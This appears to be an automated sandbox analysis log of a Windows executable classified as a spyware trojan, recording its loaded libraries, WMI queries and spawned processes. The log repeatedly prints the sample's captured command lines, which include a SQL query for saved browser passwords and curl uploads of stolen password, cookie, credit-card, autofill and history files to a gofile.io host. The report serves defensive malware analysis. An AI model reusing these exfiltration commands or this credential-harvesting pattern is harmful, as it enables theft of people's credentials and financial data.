Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B7688	0_2_00007FF7333B7688
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AAE20	0_2_00007FF7333AAE20
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AF638	0_2_00007FF7333AF638
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A96D0	0_2_00007FF7333A96D0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A0D18	0_2_00007FF7333A0D18
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A1538	0_2_00007FF7333A1538
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398DC0	0_2_00007FF733398DC0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\main.exe

Code function: String function: 00007FF733391E50 appears 53 times

PE file contains executable resources (Code or Archives)

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: python3.dll.0.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
Source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
Source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamepython3.dll. vs main.exe

Source: classification engine

Classification label: mal92.troj.spyw.winEXE@40/137@2/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802

Jump to behavior

Source: main.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\main.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT action_url, username_value, password_value FROM logins;

Source: main.exe	ReversingLabs: Detection: 15%
Source: main.exe	Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\main.exe

File read: C:\Users\user\Desktop\main.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: main.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: main.exe

Static file information: File size 27577634 > 1048576

Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: main.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: main.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
